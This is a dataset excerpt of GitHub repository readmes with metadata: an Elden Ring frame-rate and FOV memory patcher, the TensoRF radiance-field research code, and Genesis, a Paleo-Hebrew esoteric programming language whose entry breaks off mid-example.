Dataset schema (min/max are observed values; for string columns the range is of string lengths; ⌀ marks nullable columns):

| column | dtype | min | max |
| --- | --- | --- | --- |
| repo | string | 7 | 106 |
| readme ⌀ | string | 1 | 512k |
| description ⌀ | string | 1 | 3.38k |
| topics ⌀ | string | 2 | 244 |
| releases | int64 | 0 | 1k |
| contributors | int64 | 0 | 10k |
| pulls | int64 | 0 | 66.4k |
| commits | int64 | 1 | 463k |
| issues | int64 | 0 | 14.5k |
| branches | int64 | 1 | 4.52k |
| workflows | int64 | 0 | 116 |
uberhalit/EldenRingFpsUnlockAndMore
# Elden Ring FPS Unlocker and more

A small utility to remove the frame rate limit, change the FOV (field of view), add widescreen support, alter the game speed and apply various other game modifications for [Elden Ring](https://en.bandainamcoent.eu/elden-ring/elden-ring), written in C#. More features soon!

Patches the game's memory while it is running and does not modify any game files. Works with every game version (legit Steam & oh-not-so-legit) and should work with all future updates.

## Download

**[Get the latest release here](https://github.com/uberhalit/EldenRingFpsUnlockAndMore/releases)**

## Features

* does not modify any game files, RAM patches only
* works with the legit, unmodified Steam version as well as with unpacked, not-so-legit versions
* unlock frame rate (remove FPS limit)
* remove forced 60 Hertz (Hz) limit in fullscreen
* increase or decrease field of view (FOV)
* disable camera auto-rotate adjustment on movement (intended for mouse users)
* disable centering of camera (cam reset) on lock-on if there is no target
* add support for widescreen monitors
* game modifications
  * global game speed modifier (increase or decrease)
  * disable losing Runes on death
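The utility itself is written in C#, but the core idea, hot-patching bytes in a running process instead of editing files, can be sketched with the Windows `OpenProcess`/`WriteProcessMemory` APIs. The following Python snippet is a minimal illustration of RAM patching in general, not the patcher's actual code; the PID, address and patch bytes are placeholders.

```python
import ctypes
from ctypes import wintypes

# Minimal rights needed for WriteProcessMemory (Windows-only sketch).
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_OPERATION = 0x0008

def patch_process_memory(pid: int, address: int, new_bytes: bytes) -> bool:
    """Write new_bytes into another process at address; True on success."""
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.OpenProcess.restype = wintypes.HANDLE
    handle = kernel32.OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, False, pid)
    if not handle:
        return False
    try:
        written = ctypes.c_size_t(0)
        ok = kernel32.WriteProcessMemory(
            handle, ctypes.c_void_p(address),
            new_bytes, len(new_bytes), ctypes.byref(written),
        )
        return bool(ok) and written.value == len(new_bytes)
    finally:
        kernel32.CloseHandle(handle)

# Hypothetical usage (placeholder PID/address, NOT a real game offset):
# patch_process_memory(pid=1234, address=0x7FF600001000, new_bytes=b"\x90\x90")
```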
## Preview

[![Elden Ring FPS Unlocker and more](https://user-images.githubusercontent.com/19159295/156041448-ba5e08df-bb5e-4ac7-a8f0-772d8f039f76.png)](#)

## Usage

**Make sure the game is running in offline mode and the AntiCheat (EAC) isn't running.** The graphics setup only has to be done once, but as the patcher hot-patches the memory, **you have to start the patcher every time you want to use any of its features**. The game enforces VSYNC and forces 60 Hz in fullscreen even on 144 Hz monitors, so we have to override both.

#### **Nvidia**: Use Nvidia Control Panel to set 'Preferred refresh rate' to 'Highest available' on an Elden Ring profile; if you aren't using GSYNC/FreeSync, set 'Vertical sync' to 'Off'.

#### **AMD**: Use Radeon Settings to set 'Wait for Vertical Refresh' to 'Enhanced Sync', 'Fast Sync' or 'Always Off' on an Elden Ring profile.

### Follow these steps on Nvidia (see below for GSYNC):

1. Open Nvidia Control Panel
2. Navigate to `Display -> Change resolution`
3. **Make sure your monitor is set to the highest refresh rate possible:**
4. [![Make sure your monitor is set to the highest Refresh rate possible](https://user-images.githubusercontent.com/19159295/155911492-f6410e73-bcc9-457a-b2da-57f7625c3b68.PNG)](#)
5. Navigate to `3D Settings -> Manage 3D settings -> Program Settings -> Elden Ring`
6. **Set `Preferred refresh rate` to `Highest available`**
7. **Set `Vertical sync` to `Off`**
8. [![Preferred refresh rate to Highest available, VSYNC to Off](https://user-images.githubusercontent.com/19159295/155911494-a50af476-5367-42b1-90f1-106aaa28f368.PNG)](#)
9. Hit apply and close Nvidia Control Panel
10. Start `Elden Ring FPS Unlocker and more` and start the game through the first button
11. Set your new refresh rate limit, tick the checkbox and click `Patch game`

### Follow these steps on AMD:

1. Right click on Desktop -> `Display settings`
2. Scroll down and click `Advanced Display Settings -> Display Adapter Properties`
3. **Switch to the `Monitor` tab and make sure your monitor is set to the highest refresh rate possible:**
4. [![Make sure your monitor is set to the highest Refresh rate possible](https://camo.githubusercontent.com/8ba71a0b512eb68509f7e7506a92a78f3cd47537/68747470733a2f2f692e696d6775722e636f6d2f61774b4862774d2e706e67)](#)
5. Open Radeon Settings
6. Navigate to `Gaming -> Elden Ring`, or add it manually if it's missing: `Add -> Browse -> Elden Ring`
7. **Set `Wait for Vertical Refresh` to `Enhanced Sync`, `Fast Sync` or `Always Off`**:
8. [![Wait for Vertical Refresh Enhanced Sync](https://camo.githubusercontent.com/7c00daebb59c7e46c455e30b6caa055c63185dcb/68747470733a2f2f692e696d6775722e636f6d2f456e77595146322e706e67)](#)
9. Apply and close Radeon Settings
10. Start `Elden Ring FPS Unlocker and more` and start the game through the first button
11. Set your new refresh rate limit, tick the checkbox and click `Patch game`

### To play the game with GSYNC, do these additional steps (Nvidia):

1. Under Nvidia Control Panel, navigate to `3D Settings -> Manage 3D settings -> Program Settings -> Elden Ring`
2. Set `Monitor Technology` to `G-SYNC`
3. You can keep `Vertical sync` on `Use the 3D application setting` now to help remove frame time stutters ([see here](https://www.blurbusters.com/gsync/gsync101-input-lag-tests-and-settings/15/))
4. Make sure that `Preferred refresh rate` is still set to `Highest available`
5. [![GSYNC Settings](https://user-images.githubusercontent.com/19159295/155911496-5fda4bc9-1b8e-4f79-a76d-4a130d65fbe6.PNG)](#)
6. Don't forget to apply and close Nvidia Control Panel
7. Use a 3rd-party frame rate limiter like [RTSS](https://www.guru3d.com/files-details/rtss-rivatuner-statistics-server-download.html) and set a frame rate limit a few fps below your monitor refresh rate; on a 144 Hz monitor use 138
8. Start `Elden Ring FPS Unlocker and more` and start the game through the first button
9. Set your new refresh rate limit, tick the checkbox and click `Patch game`

### On 'Change FOV by (%)'

Increase or decrease the game's field of view (FOV) between -95% and +95%.

### On 'Widescreen support'

Adds your monitor's **native resolution** to the game's video options, overwriting the default 1920x1080 resolution. This allows widescreen monitors to use their full resolution and aspect ratio.

### On 'Disable Steam check'

Normally you don't have to tick this checkbox (except when you are drinking rum while sailing the sea). Ticking this tells the utility not to start Steam when it tries to launch the game. If your game isn't starting, untick this.

### On 'Disable camera auto rotate on movement'

Disables the automatic camera rotation adjustments while you are moving. This is mostly intended for mouse users; enabling it with non-native Windows controllers might not work correctly.

### On 'Disable camera reset on lock-on'

If you press your target lock-on key and no target is in sight, the game resets the camera position and disables your input while doing so. Ticking this checkbox removes this behaviour.

### On 'Disable Runes loss on death'

Like 'Unseen Aid' in Sekiro, you will not lose any Runes upon death with this option enabled.

### On 'Game speed'

Slow down the game to beat a boss like a game journalist, or speed it up and become gud. Game speed acts as a global time scale and is used by the game itself to create a dramatic effect in a few cutscenes. All game physics (even opening the menu) are affected equally: time-critical windows like dodge and deflect are proportionally prolonged or shortened, while the amount of damage given and taken, as well as all other damage physics, is unaltered. A hit from an enemy at 150% game speed does the exact same damage as at 80%; the deflect window at 50% is exactly twice as long as at 100%, and so on. Of course, your character is affected by the speed too, so even though a time window might be different now, the speed at which you can react to it is different as well. Be aware that the speed modifier can potentially crash the game in certain cutscenes and NPC interactions, so use it with caution.
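The proportionality is easy to state precisely. A tiny illustrative Python snippet (not from the utility) showing how a global time scale stretches real-time windows while damage stays fixed:

```python
def effective_window_ms(base_window_ms: float, game_speed_percent: float) -> float:
    """A window lasting base_window_ms at 100% speed lasts
    base_window_ms * (100 / game_speed_percent) of real time."""
    return base_window_ms * 100.0 / game_speed_percent

# A hypothetical 200 ms deflect window at 50% game speed lasts twice as long:
assert effective_window_ms(200, 50) == 400.0
# ...while damage values are independent of the multiplier, as noted above.
```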
## Troubleshooting

* Make sure you followed the appropriate steps and didn't skip any
* Try disabling `Fullscreen optimization` for Elden Ring: right mouse click on `eldenring.exe -> Compatibility -> tick 'Disable fullscreen optimizations'`
* If you are using ReShade, make sure your preset doesn't enforce 60 Hz; try removing ReShade and see if that solves the problem
* Game isn't starting when you click "Start game"? Untick 'Disable Steam check'
* Try adding the whole game folder and `Elden Ring FPS Unlocker and more` to your antivirus's exclusion list
* Try disabling `Steam Broadcast` (streaming via overlay)
* Try to force-disable VSYNC even when you are using GSYNC/FreeSync/FastSync
* Close and disable all screen recording and streaming applications
* Close and disable all overlays
* Close and disable all performance "booster" programs and the like
* Do a clean reinstall of your graphics driver:
  1. Download the latest graphics driver for your GPU
  2. Download [DDU](https://www.guru3d.com/files-get/display-driver-uninstaller-download,1.html)
  3. Disconnect the internet so Windows Update won't auto-install a minimal driver as soon as you uninstall the old one
  4. Boot into safe mode
  5. Completely uninstall the graphics driver and all of its utilities using DDU
  6. Reboot
  7. Install the latest driver you previously downloaded
  8. Reconnect the internet

## Prerequisites

* .NET Framework 4.8
* administrative privileges (for patching)
* 64-bit OS

## Building

Use Visual Studio 2022 to build; remove the missing `icon.ico` from the build process.

## Contributing

Feel free to open an issue or create a pull request at any time.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Credits

* huovnn for their contribution to disabling the automatic camera adjustments on movement
* [Darius Dan](http://www.dariusdan.com) for the icon

## Limitations

* the game has forced VSYNC, so unlocking the frame rate does nothing when your monitor runs at 60 Hz. You'll have to disable VSYNC in Nvidia Control Panel or AMD Radeon Settings first, see Usage
* in fullscreen the game forces the monitor to 60 Hz, so you'll have to handle this with a driver override too, see Usage
* your monitor has to natively support the widescreen resolution, otherwise it won't display correctly
* the game speed modification can potentially crash the game in certain cutscenes and NPC interactions, use with caution

## Version History

* v1.1.0.0 (2022-03-22)
  * added option to disable camera auto-rotate
  * added option to disable camera reset on lock-on if no target is in range
  * added option to disable Steam-check
* v1.0.0.1 (2022-02-28)
  * fixed an issue with the pattern for 'disabling runes loss'
* v1.0.0.0 (2022-02-28)
  * fixed issue with widescreen support not setting the correct aspect ratio
  * made game start-up and checks more robust
  * fixed an issue with game start-up on certain systems
  * disabling runes loss upon death will now no longer drop the runes you didn't lose onto the ground
  * better cleanup on exit
* v0.0.0.5-beta (2022-02-27)
  * frame rate unlock now removes the 60 Hz lock in fullscreen too (screw you FromSoft!)
  * added widescreen support patch
  * fixed a bug that would prevent re-starting the game correctly after exiting through the main menu
  * minor fixes
* v0.0.0.4-beta (2022-02-26)
  * fixed issues with the FOV changer
  * added game speed modifier
  * added option to disable the Runes penalty upon death
  * fixed game exe selection if the exe isn't called 'eldenring.exe'
  * improved stability
* v0.0.0.3-beta (2022-02-25)
  * added FOV changer
  * added handling of an alternative version of the EAC service (thanks to [DubbleClick](https://github.com/DubbleClick))
  * added handling of non-English characters in installation paths (thanks to [mrdellis](https://github.com/mrdellis))
* v0.0.0.2-beta (2022-02-25)
  * added game checks
  * fixed broken game start
  * added prompt to select game installation path
  * removed reference to an external MS DLL
  * multiple fixes
  * added icon
* v0.0.0.1-beta (2022-02-25)
  * Initial release
A small utility to remove frame rate limit, change FOV, add widescreen support and more for Elden Ring
gaming
releases: 3 · contributors: 4 · pulls: 14 · commits: 22 · issues: 60 · branches: 1 · workflows: 0
apchenstu/TensoRF
# TensoRF

## [Project page](https://apchenstu.github.io/TensoRF/) | [Paper](https://arxiv.org/abs/2203.09517)

This repository contains a pytorch implementation for the paper: [TensoRF: Tensorial Radiance Fields](https://arxiv.org/abs/2203.09517). Our work presents a novel approach to model and reconstruct radiance fields, achieving a super **fast** training process, a **compact** memory footprint and **state-of-the-art** rendering quality.<br><br>

https://user-images.githubusercontent.com/16453770/158920837-3fafaa17-6ed9-4414-a0b1-a80dc9e10301.mp4

## Installation

#### Tested on Ubuntu 20.04 + Pytorch 1.10.1

Install environment:
```
conda create -n TensoRF python=3.8
conda activate TensoRF
pip install torch torchvision
pip install tqdm scikit-image opencv-python configargparse lpips imageio-ffmpeg kornia tensorboard
```

## Dataset

* [Synthetic-NeRF](https://drive.google.com/drive/folders/128yBriW1IG_3NJ5Rp7APSTZsJqdJdfc1)
* [Synthetic-NSVF](https://dl.fbaipublicfiles.com/nsvf/dataset/Synthetic_NSVF.zip)
* [Tanks&Temples](https://dl.fbaipublicfiles.com/nsvf/dataset/TanksAndTemple.zip)
* [Forward-facing](https://drive.google.com/drive/folders/128yBriW1IG_3NJ5Rp7APSTZsJqdJdfc1)

## Quick Start

The training script is in `train.py`; to train a TensoRF:

```
python train.py --config configs/lego.txt
```

We provide a few examples in the configuration folder. Please note:

* `dataset_name`, choices = ['blender', 'llff', 'nsvf', 'tankstemple'];
* `shadingMode`, choices = ['MLP_Fea', 'SH'];
* `model_name`, choices = ['TensorVMSplit', 'TensorCP'], corresponding to the VM and CP decompositions. You need to uncomment the last few rows of the configuration file if you want to train with the TensorCP model;
* `n_lamb_sigma` and `n_lamb_sh` are strings specifying the number of basis components for density and appearance along the XYZ dimensions;
* `N_voxel_init` and `N_voxel_final` control the resolution of the matrix and vector factors;
* `N_vis` and `vis_every` control the visualization during training;
* you need to set `--render_test 1`/`--render_path 1` if you want to render testing views or a path after training.

For more options, refer to `opt.py`.
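To see how these options fit together, here is a hypothetical configuration file in the style of the ones in `configs/`; every key is one of the options listed above, while the values are illustrative placeholders rather than a tested recipe:

```
# hypothetical_scene.txt -- a sketch only; values are illustrative placeholders
dataset_name = blender          # ['blender', 'llff', 'nsvf', 'tankstemple']
datadir = ./data/nerf_synthetic/lego
model_name = TensorVMSplit      # or TensorCP (uncomment its rows in the real configs)
shadingMode = MLP_Fea           # or SH
n_lamb_sigma = [16,16,16]       # density basis numbers along XYZ
n_lamb_sh = [48,48,48]          # appearance basis numbers along XYZ
N_voxel_init = 2097156          # roughly 128^3
N_voxel_final = 27000000        # roughly 300^3
N_vis = 5                       # number of visualization views
vis_every = 10000               # visualize every N steps
render_test = 1
```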
### For pretrained checkpoints and results, please see:

[https://1drv.ms/u/s!Ard0t_p4QWIMgQ2qSEAs7MUk8hVw?e=dc6hBm](https://1drv.ms/u/s!Ard0t_p4QWIMgQ2qSEAs7MUk8hVw?e=dc6hBm)

## Rendering

```
python train.py --config configs/lego.txt --ckpt path/to/your/checkpoint --render_only 1 --render_test 1
```

You can simply pass `--render_only 1` and `--ckpt path/to/your/checkpoint` to render images from a pre-trained checkpoint. You may also need to specify what you want to render, like `--render_test 1`, `--render_train 1` or `--render_path 1`. The rendering results are located in your checkpoint folder.

## Extracting mesh

You can also export the mesh by passing `--export_mesh 1`:

```
python train.py --config configs/lego.txt --ckpt path/to/your/checkpoint --export_mesh 1
```

Note: please re-train the model and don't use the pretrained checkpoints provided by us for mesh extraction, because some render parameters have changed.

## Training with your own data

We provide two options for training on your own image set:

1. Follow the instructions in the [NSVF repo](https://github.com/facebookresearch/NSVF#prepare-your-own-dataset), then set `dataset_name` to 'tankstemple'.
2. Calibrate images with the script from [NGP](https://github.com/NVlabs/instant-ngp/blob/master/docs/nerf_dataset_tips.md): `python dataLoader/colmap2nerf.py --colmap_matcher exhaustive --run_colmap`, then adjust `datadir` in `configs/your_own_data.txt`. Please check the `scene_bbox` and `near_far` if you get abnormal results.

## Citation

If you find our code or paper helpful, please consider citing:
```
@INPROCEEDINGS{Chen2022ECCV,
  author = {Anpei Chen and Zexiang Xu and Andreas Geiger and Jingyi Yu and Hao Su},
  title = {TensoRF: Tensorial Radiance Fields},
  booktitle = {European Conference on Computer Vision (ECCV)},
  year = {2022}
}
```
[ECCV 2022] Tensorial Radiance Fields, a novel approach to model and reconstruct radiance fields
3d-reconstruction,3d-modelling,3d-rendering
releases: 0 · contributors: 1 · pulls: 9 · commits: 16 · issues: 53 · branches: 1 · workflows: 0
elonlit/Genesis
# Genesis ***𐤁*** [![Open Source Love svg2](https://badges.frapsoft.com/os/v2/open-source.svg?style=for-the-badge)](https://github.com/ellerbrock/open-source-badges/)

> "*My frame was not hidden from you, when I was being made in secret, intricately woven in the depths of the earth. Your eyes saw my unformed substance; in your book were written, every one of them, the days that were formed for me, when as yet there was none of them*" [^1]

Genesis is an interpreted, procedural, and Turing-complete Paleo-Hebrew programming language. Diacritical signs are forgone for simplicity, though Nikud may be used in the future as a means of adding more reserved keywords.

<p align="center">
  <img src="https://img.shields.io/badge/Platforms-win%20%7C%20linux%20%7C%20osx-lightgrey" />
  <!--<img src="https://img.shields.io/powershellgallery/p/DNS.1.1.1.1" />-->
  <a href="https://github.com/elonlit/Genesis/blob/master/LICENSE">
    <img src="https://img.shields.io/badge/license-HOLY--LICENSE-yellow" />
  </a>
</p>

<p align="center">
  <a href="#valid-keywords">Keywords</a> •
  <a href="#operations-punctuation-elements--identifiers">Operators</a> •
  <a href="#data-types--literals">Types</a> •
  <a href="#control-flow">Control Flow</a> •
  <a href="#subroutines">Subroutines</a> •
  <a href="#data-structures">Data Structures</a> •
  <a href="#math-library--native-utilities">Utilities</a> •
  <a href="#faq">FAQ</a>
</p>

---

## Valid Keywords

| Lexeme | 𐤏 Equivalent(s) |
| ------------- | ------------- |
| Print | 𐤄𐤃𐤐𐤎 |
| Print Line | 𐤄𐤃𐤐𐤎𐤇 |
| Declare/Initialize Variable | 𐤄𐤂𐤃𐤓 |
| Declare Subroutine | 𐤐𐤅𐤍𐤒𐤑𐤉𐤄 |
| If | 𐤀𐤌 |
| Then | 𐤀𐤆 |
| While | 𐤁𐤏𐤅𐤃 |
| For | 𐤏𐤁𐤅𐤓 |
| For Each | 𐤏𐤁𐤅𐤓𐤊𐤋 |
| Sleep | 𐤉𐤔𐤍 |
| Consecrate | 𐤒-𐤃-𐤔 |

The `𐤒-𐤃-𐤔` keyword, meaning literally "to consecrate" or "to purify," denotes where the scope of a subroutine or loop terminates.

## Operations, Punctuation Elements, & Identifiers

Java-style syntax and precedence are preserved for most operators:

`+` - addition (numbers, strings)<br />
`-` - subtraction (numbers)<br />
`/` - division (numbers)<br />
`*` - multiplication (numbers)<br />
`^` - power (numbers)<br />
`=` - assignment (numbers, strings)<br />
`==` - logical equals (numbers, strings)<br />
`=!` - not equal to (numbers, strings)<br />
`<` - less than (numbers)<br />
`>` - greater than (numbers)<br />
`=>` - greater than or equal to (numbers)<br />
`=<` - less than or equal to (numbers)<br />
`&&` - logical and (booleans)<br />
`||` - logical or (booleans)<br />

However, the associativity of most operators is from right to left:

<pre dir="rtl" align="right">
𐤄𐤂𐤃𐤓 𐤐𐤅 = 𐤊״𐤇 - 𐤄׳ // 23
</pre>

Identifiers can be represented by alphanumeric text (including `_`) and do not have to start with an alphabetic character.

## Data Types & Literals

Genesis is weakly and dynamically typed, so casting between primitives is handled implicitly by the interpreter. There are three data types:

1. Number - Encompasses `Bytes`, `Shorts`, `Integers`, `Longs`, `Doubles`, and `Floats`.
2. Boolean - Supports literals `𐤀𐤌𐤕` or `𐤔𐤒𐤓`, which correspond to `True` or `False`, respectively.
3. String - Delimited by quotation marks, e.g. `"!𐤔𐤋𐤅𐤌 𐤏𐤅𐤋𐤌"`.

The Paleo-Hebrew alphabet may have used gematria to denote cardinal values, although there is only evidence of this on the Samaria Ostraca and Dead Sea Scroll 4Q252. This quasi-decimal isopsephic number system is adopted for lack of an academic consensus. In this paradigm of numerology there is no notation for zero, and the numeric values of individual letters are added together. Each unit (`1`, `2`, ..., `9`) is assigned a separate letter, each of the tens (`10`, `20`, ..., `90`) a separate letter, and each of the first four hundreds (`100`, `200`, `300`, `400`) a separate letter. The later hundreds (`500`, `600`, `700`, `800`, and `900`) are represented by the sum of two or three letters representing the first four hundreds. To represent numbers from `1,000` to `999,999`, the same letters are reused to serve as thousands, tens of thousands, and hundreds of thousands. Biblical pseudepigrapha use these transformations extensively.

Standard (normative value) encoding per the conventional affine Mispar Hechrachi method of gematria is as follows:

| Decimal | Hebrew | 𐤏 Glyph |
| --- | --- | --- |
| 1 | Alep | 𐤀 |
| 2 | Bet | 𐤁 |
| 3 | Gimel | 𐤂 |
| 4 | Dalet | 𐤃 |
| 5 | He | 𐤄 |
| 6 | Waw | 𐤅 |
| 7 | Zayin | 𐤆 |
| 8 | Het | 𐤇 |
| 9 | Tet | 𐤈 |
| 10 | Yod | 𐤉 |
| 20 | Kaf | 𐤊 |
| 30 | Lamed | 𐤋 |
| 40 | Mem | 𐤌 |
| 50 | Nun | 𐤍 |
| 60 | Samek | 𐤎 |
| 70 | Ayin | 𐤏 |
| 80 | Pe | 𐤐 |
| 90 | Sade | 𐤑 |
| 100 | Qop | 𐤒 |
| 200 | Res | 𐤓 |
| 300 | Sin | 𐤔 |
| 400 | Taw | 𐤕 |

Gershayim `״` (U+05F4 in Unicode, resembling a double quote mark, and sometimes erroneously referred to as merkha'ot, which is Hebrew for double quotes) are inserted before (to the right of) the last (leftmost) letter to indicate that the sequence of letters represents a gematric sequence of at least two Hebrew numerals (e.g., `28` → `𐤊״𐤇` and `5782` → `𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤒𐤐״𐤁`). Similarly, a single geresh `׳` (U+05F3 in Unicode, resembling a single quote mark) is appended after (to the left of) a single letter where a number is represented by a single Hebrew numeral (e.g. `100` → `𐤒׳`).
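To make the numeral scheme concrete, here is a small Python sketch (not part of the Genesis interpreter) that decodes a numeral under the simple additive reading above; the thousands-reuse rule is deliberately left out:

```python
# Mispar Hechrachi values of the Paleo-Hebrew letters, as tabulated above.
VALUES = {
    "𐤀": 1, "𐤁": 2, "𐤂": 3, "𐤃": 4, "𐤄": 5, "𐤅": 6, "𐤆": 7,
    "𐤇": 8, "𐤈": 9, "𐤉": 10, "𐤊": 20, "𐤋": 30, "𐤌": 40, "𐤍": 50,
    "𐤎": 60, "𐤏": 70, "𐤐": 80, "𐤑": 90, "𐤒": 100, "𐤓": 200,
    "𐤔": 300, "𐤕": 400,
}

def decode(numeral: str) -> int:
    """Sum letter values; geresh/gershayim marks are simply skipped."""
    return sum(VALUES[ch] for ch in numeral if ch in VALUES)

assert decode("𐤊״𐤇") == 28     # 20 + 8
assert decode("𐤒׳") == 100
assert decode("𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤕𐤒𐤐״𐤁") == 5782  # 14*400 + 100 + 80 + 2
```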
## Control Flow

> "*Seek the Lord while he may be found; call on him while he is near*" [^2]

The standard suite of loop constructs is supported. An iterative implementation that generates the first ten terms of the Fibonacci sequence using a `𐤁𐤏𐤅𐤃` loop is formulated as an example:

<pre dir="rtl" align="right">
𐤄𐤂𐤃𐤓 𐤌𐤎𐤐𐤓 = 𐤉׳
𐤄𐤂𐤃𐤓 𐤓𐤀𐤔𐤅𐤍 = 𐤀׳
𐤄𐤂𐤃𐤓 𐤔𐤍𐤉𐤄 = 𐤀׳ - 𐤀׳
𐤄𐤂𐤃𐤓 𐤃𐤋𐤐𐤒 = 𐤀׳ - 𐤀׳
𐤄𐤂𐤃𐤓 𐤆𐤌𐤍𐤉 = 𐤀׳ - 𐤀׳
𐤁𐤏𐤅𐤃 𐤃𐤋𐤐𐤒 <= 𐤌𐤎𐤐𐤓:
𐤄𐤃𐤐𐤎𐤇 𐤔𐤍𐤉𐤄
𐤆𐤌𐤍𐤉 = 𐤓𐤀𐤔𐤅𐤍 + 𐤔𐤍𐤉𐤄
𐤓𐤀𐤔𐤅𐤍 = 𐤔𐤍𐤉𐤄
𐤔𐤍𐤉𐤄 = 𐤆𐤌𐤍𐤉
𐤃𐤋𐤐𐤒 = 𐤃𐤋𐤐𐤒 + 𐤀׳
𐤒-𐤃-𐤔
</pre>

The following `𐤏𐤁𐤅𐤓` loop prints out the first ten natural numbers:

<pre dir="rtl" align="right">
𐤏𐤁𐤅𐤓 𐤌𐤎𐤐𐤓=𐤉׳,𐤌𐤎𐤐𐤓>=𐤀׳,𐤌𐤎𐤐𐤓=𐤌𐤎𐤐𐤓-𐤀׳:
𐤄𐤃𐤐𐤎𐤇 𐤌𐤎𐤐𐤓
𐤒-𐤃-𐤔
</pre>

To accomplish nested operations or anamorphism, a composition of subroutines is recommended.
## Subroutines

> "*'I AM THAT I AM'*" [^3]

Functions in Genesis are declared using the `𐤐𐤅𐤍𐤒𐤑𐤉𐤄` keyword. Being void and non-parameterized, however, they are actually subroutines. Recursion exists insofar as a self-referential call from within a subroutine is possible, but there is no means to exit that recursion, expressing the irrevocable danger of pride and egoism. This design follows the contention that recursion, as Peter Deutsch identified, is divine and not encompassed by the domain of human programmers, as evidenced by God identifying himself recursively.

<!--- > "*For if, after they have returned from the defilements of the world by the knowledge of the Lord and Savior Jesus Christ, they are again entangled in them and are overcome, the last state has become worse for them than the first*"-->

To call a subroutine, use the reference name with which it was defined. The following subroutine `𐤇𐤉𐤁𐤅𐤓` approximates the gravitational force of a 290-gram KJV Compact Ultraslim Bible one meter from a 70-kg human being:

<pre dir="rtl" align="right">
𐤄𐤂𐤃𐤓 𐤊𐤅𐤇 = (𐤀׳ / (𐤉׳ ^ 𐤉״𐤀)) * (𐤕𐤓𐤎״𐤆 / 𐤒׳)
𐤄𐤂𐤃𐤓 𐤕𐤅𐤓𐤄 = 𐤊״𐤈 / 𐤒׳
𐤄𐤂𐤃𐤓 𐤀𐤃𐤌 = 𐤏׳
𐤄𐤂𐤃𐤓 𐤌𐤓𐤇𐤒 = 𐤀׳
𐤐𐤅𐤍𐤒𐤑𐤉𐤄 𐤇𐤉𐤁𐤅𐤓:
𐤄𐤂𐤃𐤓 𐤄𐤇𐤉𐤁𐤅𐤓 = (𐤊𐤅𐤇 * 𐤕𐤅𐤓𐤄 * 𐤀𐤃𐤌) / (𐤌𐤓𐤇𐤒 * 𐤌𐤓𐤇𐤒)
𐤄𐤃𐤐𐤎 𐤄𐤇𐤉𐤁𐤅𐤓
𐤒-𐤃-𐤔 𐤇𐤉𐤁𐤅𐤓
𐤇𐤉𐤁𐤅𐤓
</pre>

Other examples can be found in the repository.
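Reading the gematria off the snippet above gives G = (1/10^11) * (667/100) = 6.67e-11, a 0.29 kg Bible, a 70 kg human and a distance of 1 m. A quick Python cross-check of the value the subroutine prints:

```python
# Cross-check of the constants encoded in the snippet above (SI units assumed):
G = (1 / 10**11) * (667 / 100)   # 𐤀׳/(𐤉׳^𐤉״𐤀) * (𐤕𐤓𐤎״𐤆/𐤒׳) = 6.67e-11
bible_kg = 29 / 100              # 𐤊״𐤈/𐤒׳ = 0.29
human_kg = 70                    # 𐤏׳
distance_m = 1                   # 𐤀׳
force = (G * bible_kg * human_kg) / (distance_m * distance_m)
print(f"{force:.3e} N")          # ~1.354e-09 newtons
```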
## Data Structures

Genesis provides fixed-length untyped array data structures. Curly braces are used to initialize arrays, and elements can be accessed or mutated through square-bracket index operators:

<pre dir="rtl" align="right">
𐤄𐤂𐤃𐤓 𐤌𐤎𐤐𐤓 = {𐤀׳, 𐤁׳, 𐤂׳}
𐤌𐤎𐤐𐤓[𐤈׳/𐤈׳] = 𐤔𐤒𐤓
𐤏𐤁𐤅𐤓𐤊𐤋 𐤀𐤋𐤌𐤍𐤈, 𐤌𐤎𐤐𐤓:
𐤄𐤃𐤐𐤎𐤇 𐤀𐤋𐤌𐤍𐤈
𐤒-𐤃-𐤔
</pre>

As denoted, a `𐤏𐤁𐤅𐤓` or `𐤏𐤁𐤅𐤓𐤊𐤋` loop over an array yields its values.

## Math Library & Native Utilities

| Function | Description | 𐤏 Equivalent(s) |
| :-- | --- | --: |
| Sqrt(#) | Returns the correctly rounded positive square root of a number value. | 𐤔𐤅𐤓𐤔(𐤍) |
| Sin(∠) | Returns the trigonometric sine of an angle. | 𐤎𐤉𐤍(𐤈) |
| Cos(∠) | Returns the trigonometric cosine of an angle. | 𐤒𐤅𐤎(𐤈) |
| Tan(∠) | Returns the trigonometric tangent of an angle. | 𐤈𐤍(𐤈) |
| ToDegrees(C) | Converts an angle measured in radians to degrees. | 𐤋𐤃(𐤒) |
| ToRadians(∠) | Converts an angle measured in degrees to radians. | 𐤋𐤓(𐤈) |
| Absolute(#) | Returns the absolute value of a number value. | 𐤏𐤌𐤇(𐤍) |
| Log(#) | Returns the natural logarithm (base *e*) of a number value. | (𐤍)𐤋𐤅𐤂 |
| Exp(#) | Returns Euler's number *e* raised to the power of a number value. | (𐤍)𐤀𐤒𐤎𐤐 |
| Ulp(#) | Returns the size of an ulp of the argument. | (𐤍)𐤀𐤅𐤋𐤐 |
| PI() | Returns π rounded to double precision. | ()𐤐𐤉𐤉 |
| Random() | Returns a number value greater than or equal to 0.0 and less than 1.0. | ()𐤓𐤍𐤃 |
| Evince() | Returns a random Bible quote. | ()𐤁𐤓𐤀 |

Some calculations:

<pre dir="rtl" align="right">
𐤄𐤂𐤃𐤓 𐤔𐤈𐤇 = 𐤃׳ * 𐤐𐤉𐤉() * (𐤉״𐤁 ^ 𐤁׳)
𐤄𐤂𐤃𐤓 𐤌𐤔𐤅𐤋𐤔 = (𐤀׳/𐤁׳) * (𐤄׳ * 𐤎״𐤃 * 𐤎𐤉𐤍(𐤌״𐤄))
𐤄𐤂𐤃𐤓 𐤒𐤋 = 𐤔𐤅𐤓𐤔(𐤎״𐤃) * 𐤓𐤍𐤃()
𐤄𐤃𐤐𐤎𐤇 𐤔𐤈𐤇
𐤄𐤃𐤐𐤎𐤇 𐤌𐤔𐤅𐤋𐤔
𐤄𐤃𐤐𐤎𐤇 𐤒𐤋
</pre>

A subroutine for calculating the energy of an electron in the <i>`𐤍`</i>-th orbital of a hydrogenic atom in Joules:

<pre dir="rtl" align="right">
𐤐𐤅𐤍𐤒𐤑𐤉𐤄 𐤀𐤍𐤓𐤂𐤉𐤄:
